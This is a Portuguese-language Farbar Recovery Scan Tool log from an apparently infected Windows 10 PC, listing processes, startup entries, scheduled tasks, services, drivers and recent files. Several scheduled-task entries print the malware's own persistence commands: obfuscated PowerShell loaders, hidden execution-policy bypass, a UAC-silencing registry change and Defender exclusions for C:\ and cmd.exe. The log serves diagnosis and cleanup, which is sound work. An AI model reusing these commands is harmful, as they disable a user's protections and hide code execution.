Resultado do anÃ¡lise da Farbar Recovery Scan Tool (FRST) (x64) VersÃ£o: 04-04-2023
Executado por matheuszao (administrador) em DESKTOP-HTB3HK5 (INSYS WH1-K14C) (05-04-2023 12:23:05)
Executando a partir de C:\Users\matheuszao\Downloads
Perfis Carregados: matheuszao
Plataforma: Microsoft Windows 10 Pro Education VersÃ£o 21H2 19044.1826 (X64) Idioma: PortuguÃªs (Portugal)
Navegador padrÃ£o: Edge
Modo da InicializaÃ§Ã£o: Normal

==================== Processos (Whitelisted) =================

(Se uma entrada for incluÃ­da na fixlist, o processo serÃ¡ fechado. O arquivo nÃ£o serÃ¡ movido.)

(C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe ->) (Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(explorer.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe <26>
(Kilonova LLC -> Skillbrains) C:\Program Files (x86)\Skillbrains\lightshot\5.5.0.7\Lightshot.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\mewmiprov.inf_amd64_cad1db73e8c782a6\WMIRegistrationService.exe
(services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\piecomponent.inf_amd64_6e21242a0a001415\Intel_PIE_Service.exe
(services.exe ->) (Malwarebytes Inc. -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft GameInput\x64\gameinputsvc.exe <2>
(services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_7.70.13002.0_x64__8wekyb3d8bbwe\gamingservices.exe
(services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_7.70.13002.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe
(services.exe ->) (philandro Software GmbH -> AnyDesk Software GmbH) C:\Program Files (x86)\AnyDesk\AnyDesk.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe

==================== Registro (Whitelisted) ===================

(Se uma entrada for incluÃ­da na fixlist, o Ã­tem no Registro serÃ¡ restaurado para o padrÃ£o ou removido. O arquivo nÃ£o serÃ¡ movido.)

HKLM\...\Run: [Riot Vanguard] => "C:\Program Files\Riot Vanguard\vgtray.exe" (Nenhum Arquivo)
HKLM\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe (Nenhum Arquivo)
HKLM\...\Run: [WSVCUUpdateHelper.exe] => C:\Program Files (x86)\Wondershare\Wondershare UniConverter 14 for Windows (CPC)\WSVCUUpdateHelper.exe (Nenhum Arquivo)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe (Nenhum Arquivo)
HKLM-x32\...\Run: [FPS Booster] => "C:\Users\matheus\AppData\Local\FPS Booster\FPSBooster.exe" --background (Nenhum Arquivo)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [711288 2022-09-15] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\Run: [Everything] => "C:\Program Files (x86)\Everything\Everything.exe" -startup (Nenhum Arquivo)
HKLM-x32\...\Run: [Lightshot] => C:\Program Files (x86)\Skillbrains\lightshot\Lightshot.exe [226728 2019-07-22] (Kilonova LLC -> )
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiSpyware] RestriÃ§Ã£o <==== ATENÃÃO
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiVirus] RestriÃ§Ã£o <==== ATENÃÃO
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: RestriÃ§Ã£o <==== ATENÃÃO
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: RestriÃ§Ã£o <==== ATENÃÃO
HKU\S-1-5-21-775453029-1261430004-3493644118-1020\...\Run: [OneDrive] => "C:\Users\matheus\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background (Nenhum Arquivo)
HKU\S-1-5-21-775453029-1261430004-3493644118-1020\...\Run: [EpicGamesLauncher] => "C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe" -silent (Nenhum Arquivo)
HKU\S-1-5-21-775453029-1261430004-3493644118-1020\...\Run: [Steam] => "C:\Program Files (x86)\Steam\steam.exe" -silent (Nenhum Arquivo)
HKU\S-1-5-21-775453029-1261430004-3493644118-1020\...\Run: [MicrosoftEdgeAutoLaunch_7CFC4DF187212418CB0AF3F4296DDE3B] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [4056016 2023-03-30] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-775453029-1261430004-3493644118-1020\...\Run: [GoogleChromeAutoLaunch_E4A5006F83CDED01865FD4B8083003F6] => "C:\Program Files\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5 (Nenhum Arquivo)
HKU\S-1-5-21-775453029-1261430004-3493644118-1021\...\Run: [MicrosoftEdgeAutoLaunch_855BED1BDFB97FA14A102134ABCA8277] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [4056016 2023-03-30] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-775453029-1261430004-3493644118-1021\...\Run: [Discord] => "C:\Users\matheus2\AppData\Local\Discord\Update.exe" --processStart Discord.exe (Nenhum Arquivo)
HKU\S-1-5-21-775453029-1261430004-3493644118-1021\...\Run: [EpicGamesLauncher] => "C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe" -silent (Nenhum Arquivo)
HKU\S-1-5-21-775453029-1261430004-3493644118-1021\...\Run: [YandexBrowserAutoLaunch_15F6D6D44CC4C8DF83EF3490D890560C] => "C:\Users\matheus2\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --shutdown-if-not-closed-by-system-restart (Nenhum Arquivo)
HKU\S-1-5-21-775453029-1261430004-3493644118-1021\...\Run: [FACEIT] => "C:\Users\matheus2\AppData\Local\FACEIT\update.exe" --processStart "FACEIT.exe" (Nenhum Arquivo)
HKU\S-1-5-21-775453029-1261430004-3493644118-1021\...\Run: [BakkesMod] => "C:\Program Files\BakkesMod\BakkesMod.exe" (Nenhum Arquivo)
HKU\S-1-5-21-775453029-1261430004-3493644118-1021\...\Run: [utweb] => C:\Users\matheus\AppData\Roaming\uTorrent Web\utweb.exe [6418944 2023-02-13] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-775453029-1261430004-3493644118-1022\...\Run: [MicrosoftEdgeAutoLaunch_5F3721AF8B1232385EFFF6CB9E1BF42F] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [4056016 2023-03-30] (Microsoft Corporation -> Microsoft Corporation)
HKLM\...\Windows x64\Print Processors\Canon MG3600 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPDCT.DLL [30208 2015-03-12] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Canon BJ Language Monitor MG3600 series: C:\Windows\system32\CNMLMCT.DLL [406528 2015-03-12] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
IFEO\mpcmdrun.exe: [Debugger] C:\Windows\System32\systray.exe
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AnyDesk.lnk [2022-11-13]
ShortcutTarget: AnyDesk.lnk -> C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> AnyDesk Software GmbH)
GroupPolicy: RestriÃ§Ã£o ? <==== ATENÃÃO
Policies: C:\ProgramData\NTUSER.pol: RestriÃ§Ã£o <==== ATENÃÃO
HKLM\SOFTWARE\Policies\Mozilla\Firefox: RestriÃ§Ã£o <==== ATENÃÃO
HKLM\SOFTWARE\Policies\Google: RestriÃ§Ã£o <==== ATENÃÃO
HKLM\SOFTWARE\Policies\Microsoft\Edge: RestriÃ§Ã£o <==== ATENÃÃO

==================== Tarefas Agendadas (Whitelisted) ============

(Se uma entrada for incluÃ­da na fixlist, serÃ¡ removida do Registro. O arquivo nÃ£o serÃ¡ movido, a menos que seja colocado separadamente.)

Task: {057E6EDB-A21A-466E-A115-63EEA05A4C89} - System32\Tasks\BlueStacksHelper_nxt => C:\Program Files\BlueStacks_nxt\BlueStacksHelper.exe -sr (Nenhum Arquivo)
Task: {1CC9D932-2BAD-4D9D-ABED-090F0ED61A09} - System32\Tasks\UpdateTaskMachineQC => C:\Program Files\SoftwareDistribution\spoolvs.exe [2408448 2023-04-05] (SupervisorÐÂ®) [Arquivo nÃ£o assinado]
Task: {1E7FB59F-CE91-4A9F-9057-FA9FB1D682B2} - System32\Tasks\AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk3669 => C:\ProgramData\RuntimeBroker\RuntimeBroker.exe [126464 2022-10-29] (MicrosoftÂ® WindowsÂ® Operating System) [Arquivo nÃ£o assinado] <==== ATENÃÃO
Task: {27DCCEAB-C13E-4E95-B6E3-7D88BA181453} - System32\Tasks\MicrosoftEdgeUpd => C:\ProgramData\RuntimeBroker\RuntimeBroker.exe [126464 2022-10-29] (MicrosoftÂ® WindowsÂ® Operating System) [Arquivo nÃ£o assinado] <==== ATENÃÃO
Task: {3746DC6B-F882-4B4F-BFF9-B554BD38BA34} - System32\Tasks\MSEdgeUpdate => C:\Users\matheus\AppData\Local\MicroApp\EdgeInstall.exe (Nenhum Arquivo) <==== ATENÃÃO
Task: {3E89857B-B850-474A-8B65-2F2390D5C908} - System32\Tasks\OneDriveService => C:\ProgramData\RuntimeBroker\RuntimeBroker.exe [126464 2022-10-29] (MicrosoftÂ® WindowsÂ® Operating System) [Arquivo nÃ£o assinado] <==== ATENÃÃO
Task: {4AA46999-E0EF-4BA1-A5E4-97DB0F8E96DB} - System32\Tasks\RuntimeBroker => C:\ProgramData\RuntimeBroker\RuntimeBroker.exe [126464 2022-10-29] (MicrosoftÂ® WindowsÂ® Operating System) [Arquivo nÃ£o assinado] <==== ATENÃÃO
Task: {583C42C6-4E8A-4C8F-A594-8FFB4CBC786A} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2211.5-0\MpCmdRun.exe [1592184 2022-12-09] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {5CE26D8B-BF8D-4063-968B-91003CDDD88D} - System32\Tasks\ÐÐ±Ð½Ð¾Ð²Ð»ÐµÐ½Ð¸Ðµ ÐÑÐ°ÑÐ·ÐµÑÐ° Ð¯Ð½Ð´ÐµÐºÑ => C:\Users\matheus2\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --background-update --noerrdialogs (Nenhum Arquivo)
Task: {6FFA3B7A-B83E-45D5-95BE-2B9687415189} - System32\Tasks\dialersvc64 => powershell "function Local:wUlYUFEYToVp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$WmxwODxXqfOwoY,[Parameter(Position=1)][Type]$RfwWFNGRif)$MxdhnQEoGBf=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+'e'+''+[Char] (a entrada de dados tem 5158 mais caracteres). <==== ATENÃÃO
Task: {7DE2667A-28DD-4548-A2AA-F10906A3AA88} - System32\Tasks\AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk8129 => C:\ProgramData\RuntimeBroker\RuntimeBroker.exe [126464 2022-10-29] (MicrosoftÂ® WindowsÂ® Operating System) [Arquivo nÃ£o assinado] <==== ATENÃÃO
Task: {81380726-9A66-4CB6-BBED-387593797D60} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2211.5-0\MpCmdRun.exe [1592184 2022-12-09] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {84D619AF-3C72-4767-A3B0-CE738CC623D0} - System32\Tasks\AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk2971 => C:\ProgramData\RuntimeBroker\RuntimeBroker.exe [126464 2022-10-29] (MicrosoftÂ® WindowsÂ® Operating System) [Arquivo nÃ£o assinado] <==== ATENÃÃO
Task: {8FD21067-2FE8-4F0E-A90D-9BC145528620} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2211.5-0\MpCmdRun.exe [1592184 2022-12-09] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {946F8783-AF8B-4E1C-95B2-D8C603C5D7B7} - System32\Tasks\Microsoft\OneCore\DirectX\UpdateDirectX => C:\ProgramData\USOShared\MenuStartExperienceHost.vbs [178 2022-07-22] () [Arquivo nÃ£o assinado]
Task: {9AAD5138-6A11-4866-B9E9-6AF3B62FC5C7} - System32\Tasks\update-S-1-5-21-775453029-1261430004-3493644118-1002 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe -runmode=checkupdate (Nenhum Arquivo)
Task: {A0EA34E7-0F7E-4AB3-94E3-885095EA3C21} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe -runmode=checkupdate (Nenhum Arquivo)
Task: {ACAC5228-1B15-48B5-9B33-3E5D0FE36B46} - System32\Tasks\AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk9274 => C:\ProgramData\RuntimeBroker\RuntimeBroker.exe [126464 2022-10-29] (MicrosoftÂ® WindowsÂ® Operating System) [Arquivo nÃ£o assinado] <==== ATENÃÃO
Task: {B95BE744-486A-4C61-BAC2-8994C1C58D91} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Common Files\Overwolf\OverwolfUpdater.exe /RunningFrom Schedule (Nenhum Arquivo)
Task: {C4A3D594-AC37-4412-AE0D-11E659DAE9DE} - System32\Tasks\Microsoft\XblGameSave\TaskStartupApp => C:\Users\Public\Libraries\ShellExperienceHost.exe (Nenhum Arquivo) <==== ATENÃÃO
Task: {CBE024EA-FCD3-4F16-8C9B-5A8D24FFA427} - System32\Tasks\Windows\Computing => C:\ProgramData\Comms\SearchFilterHost.exe [2379264 2022-12-27] (Computing Corporation) [Arquivo nÃ£o assinado]
Task: {CE56129A-83C0-4A7F-BB94-6AF30EF0E4A0} - System32\Tasks\Microsoft\OneCore\DirectX\DirectXUpdate => cmd.exe /c powershell -ep bypass -w hidden - < C:\ProgramData\USOShared\MenuStartExperienceHost.txt <==== ATENÃÃO
Task: {D402C157-AEAD-42BD-AAB4-64998699858D} - System32\Tasks\dialersvc32 => powershell "function Local:yThzsaQcgUnd{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$apteupcTgPvVBL,[Parameter(Position=1)][Type]$juZVkVRlvt)$mcjukXYgLGc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+'e'+'c'+[Char](116)+''+[Char](10 (a entrada de dados tem 5309 mais caracteres). <==== ATENÃÃO
Task: {DE5FB599-E6FF-4CF7-8644-D43B391C0DB5} - System32\Tasks\ChromeUpdate => C:\Users\matheus\AppData\Local\ServiceApp\ChromeInstall.exe (Nenhum Arquivo) <==== ATENÃÃO
Task: {E1D626B8-6C52-48B7-BD9D-9BE943BBE822} - System32\Tasks\yr2l5dk31e => C:\Users\mathe\AppData\Roaming\yr2l5dk31e\svcupdater.exe (Nenhum Arquivo) <==== ATENÃÃO
Task: {E37EC29D-10EB-42AC-9DDB-62348CB68CE9} - System32\Tasks\AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk1580 => C:\ProgramData\RuntimeBroker\RuntimeBroker.exe [126464 2022-10-29] (MicrosoftÂ® WindowsÂ® Operating System) [Arquivo nÃ£o assinado] <==== ATENÃÃO
Task: {EA814BC4-053C-40DC-BAF5-7F2E5D85A077} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2211.5-0\MpCmdRun.exe [1592184 2022-12-09] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {EF19621C-0044-43AB-A947-896D823FB3F7} - System32\Tasks\AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk1110 => C:\ProgramData\RuntimeBroker\RuntimeBroker.exe [126464 2022-10-29] (MicrosoftÂ® WindowsÂ® Operating System) [Arquivo nÃ£o assinado] <==== ATENÃÃO
Task: {F1489CDD-B7B1-4DF9-8A89-2A385890EC16} - System32\Tasks\Microsoft\XblGameSave\AppTaskStartup => powershell.exe -w hidden Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
Task: {FCDA0293-ADCA-4FE6-862D-3783FB02ECE7} - System32\Tasks\Microsoft\XblGameSave\GameSaveTaskXbl => powershell.exe -w hidden -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\,C:\Users\mathe,.exe,cmd.exe

(Se uma entrada for incluÃ­da na fixlist, o arquivo da tarefa (.job) serÃ¡ movido. O arquivo que estÃ¡ sendo executado pela tarefa nÃ£o serÃ¡ movido.)

Task: C:\Windows\Tasks\update-S-1-5-21-775453029-1261430004-3493644118-1002.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
Task: C:\Windows\Tasks\update-sys.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
Task: C:\Windows\Tasks\ÐÐ±Ð½Ð¾Ð²Ð»ÐµÐ½Ð¸Ðµ ÐÑÐ°ÑÐ·ÐµÑÐ° Ð¯Ð½Ð´ÐµÐºÑ.job => C:\Users\matheus2\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

==================== Internet (Whitelisted) ====================

(Se um Ã­tem for incluÃ­do na fixlist, sendo um Ã­tem do Registro, serÃ¡ removido ou restaurado para o padrÃ£o.)

Hosts: HÃ¡ mais de uma entrada no Hosts. Veja a seÃ§Ã£o Hosts do Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{be234d7b-dce2-47e5-a0d8-18bb23c9a78e}: [NameServer] 1.1.1.1,1.0.0.1
Tcpip\..\Interfaces\{be234d7b-dce2-47e5-a0d8-18bb23c9a78e}: [DhcpNameServer] 192.168.1.254

Edge: 
=======
Edge DefaultProfile: Default
Edge Profile: C:\Users\matheuszao\AppData\Local\Microsoft\Edge\User Data\Default [2023-04-05]
Edge HKLM\...\Edge\Extension: [macjkjgieeoakdlmmfefgmldohgddpkj] - C:\Users\matheus\AppData\Local\MicroApp\apps-helper\apps.crx <nÃ£o encontrado (a)>
Edge HKLM-x32\...\Edge\Extension: [macjkjgieeoakdlmmfefgmldohgddpkj] - C:\Users\matheus\AppData\Local\MicroApp\apps-helper\apps.crx <nÃ£o encontrado (a)>

FireFox:
========
FF Plugin-x32: @java.com/DTPlugin,version=11.351.2 -> C:\Program Files (x86)\Java\jre1.8.0_351\bin\dtplugin\npDeployJava1.dll [2022-10-29] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.351.2 -> C:\Program Files (x86)\Java\jre1.8.0_351\bin\plugin2\npjp2.dll [2022-10-29] (Oracle America, Inc. -> Oracle Corporation)

Chrome: 
=======
CHR HKLM\...\Chrome\Extension: [macjkjgieeoakdlmmfefgmldohgddpkj] - C:\Users\matheus\AppData\Local\ServiceApp\apps-helper\apps.crx <nÃ£o encontrado (a)>
CHR HKU\S-1-5-21-775453029-1261430004-3493644118-1021\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ibknafobnmndicojahlppolcaaibngjf]
CHR HKLM-x32\...\Chrome\Extension: [macjkjgieeoakdlmmfefgmldohgddpkj] - C:\Users\matheus\AppData\Local\ServiceApp\apps-helper\apps.crx <nÃ£o encontrado (a)>

==================== ServiÃ§os (Whitelisted) ===================

(Se uma entrada for incluÃ­da na fixlist, serÃ¡ removida do Registro. O arquivo nÃ£o serÃ¡ movido, a menos que seja colocado separadamente.)

R2 AnyDesk; C:\Program Files (x86)\AnyDesk\AnyDesk.exe [4021320 2022-12-27] (philandro Software GmbH -> AnyDesk Software GmbH)
S4 CucoAgent; C:\Recovery\OEM\Scripts\agent.exe [5297792 2021-11-18] (SOFTI9 - INOVAÃÃO INFORMÃTICA, LDA -> )
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [813032 2023-03-16] (EasyAntiCheat Oy -> Epic Games, Inc)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [9084512 2023-04-03] (Malwarebytes Inc. -> Malwarebytes)
S4 regin; C:\Recovery\OEM\Scripts\regin.exe [5444232 2021-09-08] (Inforlandia, SA -> )
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [6232176 2022-07-16] (Microsoft Windows Publisher -> Microsoft Corporation)
S4 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2211.5-0\NisSrv.exe [3191264 2022-12-09] (Microsoft Windows Publisher -> Microsoft Corporation)
S4 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2211.5-0\MsMpEng.exe [133592 2022-12-09] (Microsoft Windows Publisher -> Microsoft Corporation)
S4 BEService; "C:\Program Files (x86)\Common Files\BattlEye\BEService.exe" [X]
S3 EasyAntiCheat_EOS; "C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe" [X]
S3 EpicOnlineServices; "C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe" [X]
S2 Everything; "C:\Program Files (x86)\Everything\Everything.exe" -svc [X]
S3 FACEITService; "C:\Program Files\FACEIT AC\faceitservice.exe" [X]
S2 MBAMInstallerService; "C:\Users\matheus\AppData\Local\Temp\MBAMInstallerService.exe" [X] <==== ATENÃÃO
S2 MEmuSVC; "C:\Program Files\Microvirt\MEmu\MemuService.exe" [X]
S2 NoIPDUCService4; C:\Program Files (x86)\No-IP\ducservice.exe [X]
S4 NordUpdaterService; "C:\Program Files\NordUpdater\NordUpdateService.exe" [X]
S4 nordvpn-service; "C:\Program Files\NordVPN\nordvpn-service.exe" [X]
S3 OverwolfUpdater; "C:\Program Files (x86)\Common Files\Overwolf\OverwolfUpdater.exe" /RunningFrom SCM [X]
S3 xldr_crossfire_na; "C:\Program Files\Common Files\UNCHEATER\xldr_crossfire_na.exe" [X]

===================== Drivers (Whitelisted) ===================

(Se uma entrada for incluÃ­da na fixlist, serÃ¡ removida do Registro. O arquivo nÃ£o serÃ¡ movido, a menos que seja colocado separadamente.)

R2 BlueStacksDrv_msi2; C:\Program Files\BlueStacks_msi2\BstkDrv_msi2.sys [315768 2021-10-26] (Bluestack Systems, Inc -> Bluestack System Inc.)
S3 EMACDRV; C:\Windows\System32\drivers\EMAC-Driver-x64.sys [7837576 2023-03-12] (EMAC LAB SOFTWARE LTDA -> )
R3 ESAuDriver; C:\Windows\System32\drivers\ESAuDriver.sys [118904 2021-04-26] (WDKTestCert yangx,131692850569054652 -> Everest Semiconducor Co., Ltd)
R1 FACEIT; C:\Program Files\FACEIT AC\FACEIT.sys [17519624 2023-03-19] (Microsoft Windows Hardware Compatibility Publisher -> )
S3 GeneStor; C:\Windows\System32\drivers\GeneStor.sys [137432 2021-02-21] (GENESYS LOGIC, INC. -> Genesys Logic)
R3 IntcSST; C:\Windows\System32\DriverStore\FileRepository\intcsst.inf_amd64_88c705517992d11d\IntcSST.sys [726592 2021-07-29] (Intel Corporation -> Intel(R) Corporation)
S4 IObitUnlocker; C:\Program Files (x86)\IObit\IObit Unlocker\IObitUnlocker.sys [41536 2022-08-17] (Microsoft Windows Hardware Compatibility Publisher -> IObit Information Technology)
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [223176 2023-04-05] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes)
S0 MbamElam; C:\Windows\System32\DRIVERS\MbamElam.sys [21480 2023-04-03] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [239544 2023-04-05] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes)
R1 MEmuDrv; C:\Windows\system32\DRIVERS\MEmuDrv.sys [320360 2021-01-04] (Shanghai Microvirt Software Technology Co., Ltd. -> Maiwei Corporation)
R1 ndextlag; C:\Windows\system32\DRIVERS\ndextlag.sys [48640 2018-04-11] (Mainline Net Holdings Limited -> SKOWSAND SERVICOS DE PROVEDORES E INTERNET LTDA - ME)
R3 tapnordvpn; C:\Windows\System32\drivers\tapnordvpn.sys [49744 2021-06-13] (nordvpn s.a. -> The OpenVPN Project)
S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [49568 2022-12-09] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S4 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [473376 2022-12-09] (Microsoft Windows -> Microsoft Corporation)
S4 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [99616 2022-12-09] (Microsoft Windows -> Microsoft Corporation)
R3 WOVAD; C:\Windows\System32\drivers\womic.sys [51192 2022-01-14] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider)
S3 xhunter1; C:\Windows\xhunter1.sys [2522256 2022-04-27] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)
S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
S3 kgds service; \??\C:\Windows\system32\drivers\kgds.sys [X]
S2 NDivert; \??\C:\Program Files\NordVPN\6.45.8.0\Drivers\NDivert.sys [X]
S3 NTIOLib_CC_SuperIO; \??\C:\Program Files\BlueStacks_msi2\NTIOLib_X64.sys [X]

==================== NetSvcs (Whitelisted) ===================

(Se uma entrada for incluÃ­da na fixlist, serÃ¡ removida do Registro. O arquivo nÃ£o serÃ¡ movido, a menos que seja colocado separadamente.)


==================== Um mÃªs (criados) (Whitelisted) =========

(Se uma entrada for incluÃ­da na fixlist, o arquivo/pasta serÃ¡ movido.)

2023-04-05 12:23 - 2023-04-05 12:23 - 000023499 _____ C:\Users\matheuszao\Downloads\FRST.txt
2023-04-05 12:22 - 2023-04-05 12:23 - 000000000 ____D C:\FRST
2023-04-05 12:22 - 2023-04-05 12:22 - 002380288 _____ (Farbar) C:\Users\matheuszao\Downloads\FRST64.exe
2023-04-05 12:11 - 2023-04-05 12:11 - 000000000 ___HD C:\$SysReset
2023-04-05 11:57 - 2023-04-05 11:57 - 000007627 _____ C:\Users\matheuszao\Downloads\20210517101.bat
2023-04-05 11:51 - 2023-04-05 11:51 - 000000000 ____D C:\Users\matheuszao\AppData\Local\PlaceholderTileLogoFolder
2023-04-05 11:39 - 2023-04-05 11:39 - 000000000 ____D C:\Users\matheuszao\AppData\Local\UnrealEngine
2023-04-05 11:35 - 2023-04-05 11:35 - 000000000 ____D C:\Users\matheuszao\AppData\Local\OneDrive
2023-04-05 11:33 - 2023-04-05 11:33 - 014740007 _____ C:\Users\matheuszao\Downloads\Riot Vanguard new.zip
2023-04-05 11:33 - 2023-04-05 11:33 - 000000000 ____D C:\Users\matheuszao\AppData\Roaming\WinRAR
2023-04-05 11:27 - 2023-04-05 11:27 - 000000000 ___HD C:\$GetCurrent
2023-04-05 11:27 - 2023-04-05 11:27 - 000000000 ____D C:\Program Files (x86)\WindowsInstallationAssistant
2023-04-05 11:22 - 2023-04-05 11:22 - 000000000 ____D C:\Users\matheuszao\AppData\Local\Comms
2023-04-05 11:18 - 2023-04-05 11:18 - 000000000 ____D C:\Users\matheuszao\AppData\Local\CEF
2023-04-05 11:17 - 2023-04-05 11:17 - 069279968 _____ (Riot Games, Inc.) C:\Users\matheuszao\Downloads\Install VALORANT.exe
2023-04-05 11:17 - 2023-04-05 11:17 - 000000000 ____D C:\Users\matheuszao\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Riot Games
2023-04-05 11:17 - 2023-04-05 11:17 - 000000000 ____D C:\Users\matheuszao\AppData\Local\Riot Games
2023-04-05 11:15 - 2023-04-05 11:15 - 000000000 ____D C:\Users\matheus2\AppData\Local\CrashDumps
2023-04-05 11:14 - 2023-04-05 11:14 - 000000000 ____D C:\Users\matheuszao\AppData\Local\Google
2023-04-05 11:09 - 2023-04-05 11:09 - 000000000 ____D C:\Users\matheuszao\AppData\Roaming\Sun
2023-04-05 11:09 - 2023-04-05 11:09 - 000000000 ____D C:\Users\matheuszao\AppData\LocalLow\Sun
2023-04-05 11:06 - 2023-04-05 11:06 - 000003588 _____ C:\Windows\system32\Tasks\OneDrive Reporting Task-S-1-5-21-775453029-1261430004-3493644118-1022
